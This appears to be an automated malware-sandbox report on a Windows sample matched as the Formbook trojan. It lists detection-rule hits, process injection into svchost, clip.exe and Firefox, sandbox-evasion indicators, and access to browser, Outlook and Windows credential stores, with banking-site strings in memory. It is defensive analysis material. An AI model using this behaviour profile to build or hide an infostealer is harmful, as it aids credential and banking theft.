            Source: 00000002.00000002.2547555500.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3377564607.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2558893613.0000000007FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3377429665.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2548261578.0000000004990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3378789230.0000000003970000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3377223232.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@7/4
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AECE7A GetLastError,FormatMessageW,0_2_00AECE7A
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ADAB84 AdjustTokenPrivileges,CloseHandle,0_2_00ADAB84
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ADB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00ADB134
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AEE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00AEE1FD
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00AE6532
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AFC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00AFC18C
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AA406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00AA406B
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeFile created: C:\Users\user\AppData\Local\Temp\aut7B92.tmpJump to behavior
            Source: MGQeZjDXc3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: clip.exe, 00000006.00000002.3377629358.0000000003181000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000006.00000003.2734962192.0000000003152000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000006.00000002.3377629358.0000000003152000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000006.00000003.2737111388.000000000315C000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000006.00000003.2734825746.0000000003131000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: MGQeZjDXc3.exeReversingLabs: Detection: 65%
            Source: unknownProcess created: C:\Users\user\Desktop\MGQeZjDXc3.exe "C:\Users\user\Desktop\MGQeZjDXc3.exe"
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MGQeZjDXc3.exe"
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MGQeZjDXc3.exe"Jump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: MGQeZjDXc3.exeStatic file information: File size 1217024 > 1048576
            Source: MGQeZjDXc3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: MGQeZjDXc3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: MGQeZjDXc3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: MGQeZjDXc3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: MGQeZjDXc3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: MGQeZjDXc3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: MGQeZjDXc3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: PXASisZrdVntP.exe, 00000005.00000002.3377839748.000000000076E000.00000002.00000001.01000000.00000005.sdmp, PXASisZrdVntP.exe, 00000007.00000000.2619222661.000000000076E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: MGQeZjDXc3.exe, 00000000.00000003.2141324382.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, MGQeZjDXc3.exe, 00000000.00000003.2138249915.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2451784081.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2547918219.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2453391017.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2547918219.000000000339E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000006.00000003.2548033826.0000000004AD1000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000006.00000002.3379427389.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000006.00000002.3379427389.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000006.00000003.2551331041.0000000004C88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: MGQeZjDXc3.exe, 00000000.00000003.2141324382.0000000003D60000.00000004.00001000.00020000.00000000.sdmp, MGQeZjDXc3.exe, 00000000.00000003.2138249915.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2451784081.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2547918219.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2453391017.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2547918219.000000000339E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000006.00000003.2548033826.0000000004AD1000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000006.00000002.3379427389.0000000004E30000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000006.00000002.3379427389.0000000004FCE000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000006.00000003.2551331041.0000000004C88000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.2514850170.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2547714603.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, PXASisZrdVntP.exe, 00000005.00000002.3378032576.00000000007D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000006.00000002.3381029035.000000000545C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000006.00000002.3377629358.00000000030D5000.00000004.00000020.00020000.00000000.sdmp, PXASisZrdVntP.exe, 00000007.00000002.3380076501.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2845663760.00000000015BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000006.00000002.3381029035.000000000545C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000006.00000002.3377629358.00000000030D5000.00000004.00000020.00020000.00000000.sdmp, PXASisZrdVntP.exe, 00000007.00000002.3380076501.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2845663760.00000000015BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.2514850170.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2547714603.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, PXASisZrdVntP.exe, 00000005.00000002.3378032576.00000000007D8000.00000004.00000020.00020000.00000000.sdmp
            Source: MGQeZjDXc3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: MGQeZjDXc3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: MGQeZjDXc3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: MGQeZjDXc3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: MGQeZjDXc3.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ABE01E LoadLibraryA,GetProcAddress,0_2_00ABE01E
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AC6B05 push ecx; ret 0_2_00AC6B18
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040205A push esi; retf 2_2_00402076
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041405F push ds; ret 2_2_0041408A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402026 push ecx; retf 2_2_0040202D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401888 pushfd ; ret 2_2_004018D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041409F push ds; ret 2_2_0041408A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004139CC push ebx; retf 2_2_004139CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042327B pushfd ; retf 2_2_00423286
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417AC3 push 00000045h; iretd 2_2_00417ACA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004032D0 push eax; ret 2_2_004032D2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407307 push esp; ret 2_2_00407310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EC43 push edi; ret 2_2_0041EC4F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A450 push es; iretd 2_2_0041A463
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EC35 push edi; ret 2_2_0041EC4F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004084CC pushad ; iretd 2_2_004084CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401CDD push ecx; retf 2_2_00401CDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A4A7 push es; iretd 2_2_0041A463
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004186E8 push BC462628h; iretd 2_2_00418778
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418699 push ecx; ret 2_2_004186E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418699 push ds; retf 2_2_0041878A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418779 push ds; retf 2_2_0041878A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147D1 push edx; retf 2_2_004147D2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147D7 push eax; iretd 2_2_004147D8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E7AC push ebx; iretd 2_2_0041E7AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD push ecx; mov dword ptr [esp], ecx2_2_032309B6
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00B08111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B08111
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ABEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00ABEB42
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AC123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00AC123A
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeAPI/Special instruction interceptor: Address: 133A44C
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E rdtsc 2_2_0327096E
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 9829Jump to behavior
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeEvaded block: after key decisiongraph_0-94531
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeEvaded block: after key decisiongraph_0-95555
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-94978
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeAPI coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 3052Thread sleep count: 144 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 3052Thread sleep time: -288000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 3052Thread sleep count: 9829 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 3052Thread sleep time: -19658000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\gJVtvBlJQdECRXarVhCaWsfCrUFmAUEWLoaCxXQSaaIGFRsYerwqFnEfC\PXASisZrdVntP.exe TID: 7120Thread sleep time: -35000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00AE6CA9
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00AE60DD
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AE63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00AE63F9
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AEEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00AEEB60
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AEF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00AEF5FA
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AEF56F FindFirstFileW,FindClose,0_2_00AEF56F
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AF1B2F
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00AF1C8A
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00AF1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00AF1F94
            Source: C:\Users\user\Desktop\MGQeZjDXc3.exeCode function: 0_2_00ABDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00ABDDC0
            Source: 5-19-2H.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: clip.exe, 00000006.00000002.3377629358.00000000030D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
            Source: 5-19-2H.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 5-19-2H.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 5-19-2H.6.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 5-19-2H.6.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: PXASisZrdVntP.exe, 00000007.00000002.3378974641.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
